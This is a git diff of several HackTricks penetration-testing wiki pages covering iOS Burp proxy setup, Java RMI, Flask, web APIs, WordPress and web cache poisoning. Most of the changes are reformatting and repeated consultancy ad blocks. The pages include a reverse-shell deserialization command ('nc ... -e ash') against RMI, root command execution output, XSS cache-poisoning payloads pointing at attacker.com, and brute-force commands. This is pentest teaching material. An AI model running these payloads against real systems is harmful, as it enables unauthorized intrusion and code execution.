+{% hint style="danger" %} + -# Burp Cert Installation in physical iOS +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## Burp Cert Installation in physical iOS You can install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) **for help installing the Burp Certificate, configure the proxy and perform SSL Pinning.**\ Or you can manually follow the next steps: -* Configure **Burp** as the iPhone **proxy in **_**Settings**_** --> **_**Wifi**_** --> **_**Click the network**_** --> **_**Proxy**_ +* Configure **Burp** as the iPhone **proxy in \_Settings**_\*\* --> \*\*_**Wifi**_\*\* --> \*\*_**Click the network**_\*\* --> \*\*_**Proxy**\_ * Access `http://burp` and download the certificate * Access _**Setting**_ --> _**Profile Downloaded**_ and **Install** it (you will be asked your code) * Access _**Settings**_ --> _**General**_ --> _**About**_ --> _**Certificate Trust Settings**_ and enable PortSwigger CA -## Setting up an Interception Proxy via localhost +### Setting up an Interception Proxy via localhost Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your iOS device and host computer are connected to a Wi-Fi network that permits client-to-client traffic. If client-to-client traffic is not permitted, you can use usbmuxd to connect to Burp via USB. PortSwigger provides a good [tutorial on setting up an iOS device to work with Burp](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) and a [tutorial on installing Burp's CA certificate to an iOS device](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device). -### Using Burp via USB on a Jailbroken Device +#### Using Burp via USB on a Jailbroken Device When doing dynamic analysis, it's interesting to use the SSH connection to route our traffic to Burp that is running on our computer. Let's get started: @@ -61,7 +68,7 @@ The last step would be to set the proxy globally on your iOS device: 5. Type in 127.0.0.1 as **Server** 6. Type in 8080 as **Port** -## Full Network Monitoring/Sniffing +### Full Network Monitoring/Sniffing If you need to **monitor something different from HTTP communications** you can sniff all the device traffic with **wireshark**.\ You can remotely sniff all traffic in real-time on iOS by [creating a Remote Virtual Interface](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819) for your iOS device. First make sure you have **Wireshark** **installed** on your macOS host computer. @@ -85,7 +92,7 @@ ip.addr == 192.168.1.1 && http The documentation of Wireshark offers many examples for [Capture Filters](https://wiki.wireshark.org/CaptureFilters) that should help you to filter the traffic to get the information you want. -# Burp Cert Installation in Simulator +## Burp Cert Installation in Simulator * **Export Burp Certificate** @@ -105,7 +112,7 @@ In _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER for **The iOS simulator will use the proxy configurations of the MacOS.** {% endhint %} -## MacOS Proxy Configuration +### MacOS Proxy Configuration Steps to configure Burp as proxy: @@ -117,6 +124,13 @@ Steps to configure Burp as proxy: * Click on _**Ok**_ and the in _**Apply**_ +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -133,5 +147,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md index df26000ed..e8e28cc17 100644 --- a/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/network-services-pentesting/1099-pentesting-java-rmi.md @@ -1,4 +1,4 @@ - +# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
@@ -16,17 +16,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# Basic Information +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. -*Java Remote Method Invocation*, or *Java RMI*, is an object oriented *RPC* mechanism that allows an object -located in one *Java virtual machine* to call methods on an object located in another *Java virtual machine*. -This enables developers to write distributed applications using an object-oriented paradigm. A short introduction -to *Java RMI* from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t_aw1mDNhzI?t=202). +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## Basic Information + +_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t\_aw1mDNhzI?t=202). **Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999 -```text +``` PORT STATE SERVICE VERSION 1090/tcp open ssl/java-rmi Java RMI 9010/tcp open java-rmi Java RMI @@ -34,38 +38,20 @@ PORT STATE SERVICE VERSION 40259/tcp open ssl/java-rmi Java RMI ``` -Usually, only the default *Java RMI* components (the *RMI Registry* and the *Activation System*) are bound to -common ports. The *remote objects* that implement the actual *RMI* application are usually bound to random ports -as shown in the output above. +Usually, only the default _Java RMI_ components (the _RMI Registry_ and the _Activation System_) are bound to common ports. The _remote objects_ that implement the actual _RMI_ application are usually bound to random ports as shown in the output above. -*nmap* has sometimes troubles identifying *SSL* protected *RMI* services. If you encounter an unknown ssl service on -a common *RMI* port, you should further investigate. +_nmap_ has sometimes troubles identifying _SSL_ protected _RMI_ services. If you encounter an unknown ssl service on a common _RMI_ port, you should further investigate. +## RMI Components -# RMI Components +To put it in simple terms, _Java RMI_ allows a developer to make a _Java object_ available on the network. This opens up a _TCP_ port where clients can connect and call methods on the corresponding object. Despite this sounds simple, there are several challenges that _Java RMI_ needs to solve: -To put it in simple terms, *Java RMI* allows a developer to make a *Java object* available on the network. This opens -up a *TCP* port where clients can connect and call methods on the corresponding object. Despite this sounds simple, -there are several challenges that *Java RMI* needs to solve: +1. To dispatch a method call via _Java RMI_, clients need to know the IP address, the listening port, the implemented class or interface and the `ObjID` of the targeted object (the `ObjID` is a unique and random identifier that is created when the object is made available on the network. It is required because _Java RMI_ allows multiple objects to listen on the same _TCP_ port). +2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The _Java virtual machine_ needs to track which of these resources are still in use and which of them can be garbage collected. -1. To dispatch a method call via *Java RMI*, clients need to know the IP address, the listening port, the implemented - class or interface and the ``ObjID`` of the targeted object (the ``ObjID`` is a unique and random identifier that - is created when the object is made available on the network. It is required because *Java RMI* allows multiple - objects to listen on the same *TCP* port). -2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The *Java virtual - machine* needs to track which of these resources are still in use and which of them can be garbage collected. +The first challenge is solved by the _RMI registry_, which is basically a naming service for _Java RMI_. The _RMI registry_ itself is also an _RMI service_, but the implemented interface and the `ObjID` are fixed and known by all _RMI_ clients. This allows _RMI_ clients to consume the _RMI_ registry just by knowing the corresponding _TCP_ port. -The first challenge is solved by the *RMI registry*, which is basically a naming service for *Java RMI*. The *RMI -registry* itself is also an *RMI service*, but the implemented interface and the ``ObjID`` are fixed and known by -all *RMI* clients. This allows *RMI* clients to consume the *RMI* registry just by knowing the corresponding *TCP* -port. - -When developers want to make their *Java objects* available within the network, they usually bind them to an *RMI registry*. -The *registry* stores all information required to connect to the object (IP address, listening port, implemented class or -interface and the ``ObjID`` value) and makes it available under a human readable name (the *bound name*). Clients that want -to consume the *RMI service* ask the *RMI registry* for the corresponding *bound name* and the registry returns all required -information to connect. Thus, the situation is basically the same as with an ordinary *DNS* service. The following listing -shows a small example: +When developers want to make their _Java objects_ available within the network, they usually bind them to an _RMI registry_. The _registry_ stores all information required to connect to the object (IP address, listening port, implemented class or interface and the `ObjID` value) and makes it available under a human readable name (the _bound name_). Clients that want to consume the _RMI service_ ask the _RMI registry_ for the corresponding _bound name_ and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary _DNS_ service. The following listing shows a small example: ```java import java.rmi.registry.Registry; @@ -91,30 +77,21 @@ public class ExampleClient { } ``` -The second of the above mentioned challenges is solved by the *Distributed Garbage Collector* (*DGC*). This is another -*RMI service* with a well known ``ObjID`` value and it is available on basically each *RMI endpoint*. When an *RMI client* -starts to use an *RMI service*, it sends an information to the *DGC* that the corresponding *remote object* is in use. -The *DGC* can then track the reference count and is able to cleanup unused objects. +The second of the above mentioned challenges is solved by the _Distributed Garbage Collector_ (_DGC_). This is another _RMI service_ with a well known `ObjID` value and it is available on basically each _RMI endpoint_. When an _RMI client_ starts to use an _RMI service_, it sends an information to the _DGC_ that the corresponding _remote object_ is in use. The _DGC_ can then track the reference count and is able to cleanup unused objects. -Together with the deprecated *Activation System*, these are the three default components of *Java RMI*: +Together with the deprecated _Activation System_, these are the three default components of _Java RMI_: -1. The *RMI Registry* (``ObjID = 0``) -2. The *Activation System* (``ObjID = 1``) -3. The *Distributed Garbage Collector* (``ObjID = 2``) +1. The _RMI Registry_ (`ObjID = 0`) +2. The _Activation System_ (`ObjID = 1`) +3. The _Distributed Garbage Collector_ (`ObjID = 2`) -The default components of *Java RMI* have been known attack vectors for quite some time and multiple vulnerabilities -exist in outdated *Java* versions. From an attacker perspective, these default components are interisting, because -they implemented known classes / interfaces and it is easily possible to interact with them. -This situation is different for custom *RMI services*. To call a method on a *remote object*, you need to know the corresponding -method signature in advance. Without knowing an existing method signature, there is no way to communicate to a *RMI service*. +The default components of _Java RMI_ have been known attack vectors for quite some time and multiple vulnerabilities exist in outdated _Java_ versions. From an attacker perspective, these default components are interisting, because they implemented known classes / interfaces and it is easily possible to interact with them. This situation is different for custom _RMI services_. To call a method on a _remote object_, you need to know the corresponding method signature in advance. Without knowing an existing method signature, there is no way to communicate to a _RMI service_. +## RMI Enumeration -# RMI Enumeration +[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a _Java RMI_ vulnerability scanner that is capable of identifying common _RMI vulnerabilities_ automatically. Whenever you identify an _RMI_ endpoint, you should give it a try: -[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a *Java RMI* vulnerability scanner that is capable -of identifying common *RMI vulnerabilities* automatically. Whenever you identify an *RMI* endpoint, you should give it a try: - -```console +``` $ rmg enum 172.17.0.2 9010 [+] RMI registry bound names: [+] @@ -174,13 +151,11 @@ $ rmg enum 172.17.0.2 9010 [+] --> Client codebase enabled - Configuration Status: Non Default ``` -The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) -of the project. Depending on the outcome, you should try to verify identified vulnerabilities. +The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) of the project. Depending on the outcome, you should try to verify identified vulnerabilities. -The ``ObjID`` values displayed by *remote-method-guesser* can be used to determine the uptime of the service. -This may allows to identify other vulnerabilities: +The `ObjID` values displayed by _remote-method-guesser_ can be used to determine the uptime of the service. This may allows to identify other vulnerabilities: -```console +``` $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]' [+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236] [+] @@ -191,18 +166,13 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]' [+] Count: -32760 ``` -# Bruteforcing Remote Methods +## Bruteforcing Remote Methods -Even when no vulnerabilities have been identified during enumeration, the available *RMI* services -could still expose dangerous functions. Furthermore, despite *RMI* communication to *RMI* default -components is protected by deserialization filters, when talking to custom *RMI* services, such filters are -usually not in place. Knowing valid method signatures on *RMI* services is therefore valuable. +Even when no vulnerabilities have been identified during enumeration, the available _RMI_ services could still expose dangerous functions. Furthermore, despite _RMI_ communication to _RMI_ default components is protected by deserialization filters, when talking to custom _RMI_ services, such filters are usually not in place. Knowing valid method signatures on _RMI_ services is therefore valuable. -Unfortunately, *Java RMI* does not support enumerating methods on *remote objects*. That being said, -it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) -or [rmiscout](https://github.com/BishopFox/rmiscout): +Unfortunately, _Java RMI_ does not support enumerating methods on _remote objects_. That being said, it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) or [rmiscout](https://github.com/BishopFox/rmiscout): -```console +``` $ rmg guess 172.17.0.2 9010 [+] Reading method candidates from internal wordlist rmg.txt [+] 752 methods were successfully parsed. @@ -234,14 +204,14 @@ $ rmg guess 172.17.0.2 9010 Identified methods can be called like this: -```console +``` $ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar [+] uid=0(root) gid=0(root) groups=0(root) ``` Or you can perform deserialization attacks like this: -```console +``` $ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)" [+] Creating ysoserial payload... done. [+] @@ -266,23 +236,18 @@ uid=0(root) gid=0(root) groups=0(root) More information can be found in these articles: -* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/) -* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md) +* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/) +* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md) * [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) * [rmiscout](https://bishopfox.com/blog/rmiscout) -Apart from guessing, you should also look in search engines or *GitHub* for the interface or even the -implementation of an encountered *RMI* service. The *bound name* and the name of the implemented class or interface -can be helpful here. +Apart from guessing, you should also look in search engines or _GitHub_ for the interface or even the implementation of an encountered _RMI_ service. The _bound name_ and the name of the implemented class or interface can be helpful here. +## Known Interfaces -# Known Interfaces +[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as `known` if they are listed in the tool's internal database of known _RMI services_. In these cases you can use the `known` action to get more information on the corresponding _RMI service_: -[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as ``known`` if they -are listed in the tool's internal database of known *RMI services*. In these cases you can use the ``known`` action to get -more information on the corresponding *RMI service*: - -```console +``` $ rmg enum 172.17.0.2 1090 | head -n 5 [+] RMI registry bound names: [+] @@ -341,21 +306,19 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub [+] - https://github.com/qtc-de/beanshooter ``` -# Shodan +## Shodan * `port:1099 java` - -# Tools +## Tools * [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) * [rmiscout](https://github.com/BishopFox/rmiscout) * [BaRMIe](https://github.com/NickstaDB/BaRMIe) +## HackTricks Automatic Commands -# HackTricks Automatic Commands - -```text +``` Protocol_Name: Java RMI #Protocol Abbreviation if there is one. Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one. Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out @@ -366,7 +329,13 @@ Entry_1: Command: rmg enum {IP} {PORT} ``` +{% hint style="danger" %} + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -383,5 +352,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/pentesting-web/flask.md b/network-services-pentesting/pentesting-web/flask.md index 34dfa3829..aa47e2f9b 100644 --- a/network-services-pentesting/pentesting-web/flask.md +++ b/network-services-pentesting/pentesting-web/flask.md @@ -16,6 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +**** + **Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.** ## Cookies @@ -74,6 +84,14 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy [**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret. +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-web/web-api-pentesting.md b/network-services-pentesting/pentesting-web/web-api-pentesting.md index 63ec66e36..995c3974b 100644 --- a/network-services-pentesting/pentesting-web/web-api-pentesting.md +++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md @@ -16,6 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## Basic Information Main: @@ -123,6 +131,14 @@ Old versions may be still be in use and be more vulnerable than latest endpoints * `/api/CharityEventFeb2020/user/pp/` * `/api/CharityEventFeb2021/user/pp/` +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## 🛡️ API Security Empire Cheat Sheet \ @@ -139,9 +155,6 @@ The first gate to enter the API Security Empire is to know how to gather informa [**PDF Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.pdf) **|** [**XMind Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.xmind) -\ - - #### ⚔️ Weapons you will need: * [BurpSuite](https://portswigger.net/burp/releases) @@ -195,6 +208,14 @@ Read this document to learn how to **search** and **exploit** Owasp Top 10 API v * [**https://github.com/flipkart-incubator/Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing * [**https://github.com/assetnote/kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints** +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index b56c80ce6..834d13a40 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -1,7 +1,5 @@ # Wordpress -## Wordpress -
Support HackTricks and get benefits! @@ -18,6 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## Basic Information **Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\ @@ -93,6 +99,14 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## Active enumeration ### Plugins and Themes @@ -277,6 +291,14 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec #You can try to bruteforce the admin user using wpscan with "-U admin" ``` +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## **Panel RCE** **Modifying a php from the theme used (admin credentials needed)** @@ -404,7 +426,13 @@ Also, **only install trustable WordPress plugins and themes**. * **Limit login attempts** to prevent Brute Force attacks * Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses. -## +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md index 902e6bc45..9c19066f0 100644 --- a/pentesting-web/cache-deception.md +++ b/pentesting-web/cache-deception.md @@ -1,4 +1,4 @@ - +# Cache Poisoning and Cache Deception
@@ -16,22 +16,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# The difference +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## The difference > **What is the difference between web cache poisoning and web cache deception?** > > * In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users. > * In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache. -# Cache Poisoning +## Cache Poisoning The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.\ The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not. In order to perform a cache poisoning attack you need first to **identify unkeyed inputs** (parameters not needed to appear on the the cached request but that change the returned page), see **how to abuse** this parameter and **get the response cached**. -## Identify and evaluate unkeyed inputs +### Identify and evaluate unkeyed inputs You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there: @@ -39,11 +46,11 @@ You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca0 ``` -## Elicit a harmful response from the back-end server +### Elicit a harmful response from the back-end server With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it any any way (perform a XSS or load a JS code controlled by you? perform a DoS?...) -## Get the response cached +### Get the response cached Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it you need to get the page cached. Depending on the resource you are trying to get in the cache this could time more or less time and some times you just will need to be trying several seconds.\ The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\ @@ -53,9 +60,9 @@ One more header related to the cache is **`Age`**. It defines the times in secon When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working. -# Examples +## Examples -## Easiest example +### Easiest example A header like `X-Forwarded-For` is being reflected in the response unsanitized>\ You can send a basic XSS payload and poison the cache so everybody that access page will be XSSed: @@ -68,7 +75,7 @@ X-Forwarded-Host: a.">" _Note that this will poison a request to `/en?region=uk` not to `/en`_ -## Using web cache poisoning to exploit cookie-handling vulnerabilities +### Using web cache poisoning to exploit cookie-handling vulnerabilities Cookies could also be reflected on the response of a page. If you can abuse it to cause a XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response. @@ -80,7 +87,7 @@ Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b" Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache. -## Using multiple headers to exploit web cache poisoning vulnerabilities +### Using multiple headers to exploit web cache poisoning vulnerabilities Some time you will need to **exploit several ukneyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as domain name for the redirect. You can control where the pagepointed by the redirect. @@ -91,7 +98,7 @@ X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/ X-Forwarded-Scheme: http ``` -## Exploiting with limited `Vary`header +### Exploiting with limited `Vary`header If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`** . Then, you need to find a way to ex-filtrate the User-Agent of the victim and poison the cache using that user agent: @@ -102,16 +109,25 @@ User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM X-Host: attacker.com ``` -## Exploiting HTTP Cache Poisoning abusing HTTP Request Smuggling +### Exploiting HTTP Cache Poisoning abusing HTTP Request Smuggling Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning). -## Automated testing for Web Cache Poisoning +### Automated testing for Web Cache Poisoning + The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to test automated for web cache poisoning. It supports many different techniques and is highly customizable. Example usage: `wcvs -u example.com` -# Cache Deception +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## Cache Deception The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**. @@ -125,12 +141,19 @@ Note that the **cache proxy** should be **configured** to **cache** files **base Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception). -# References +## References * [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning) * [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities) * [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712) +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity 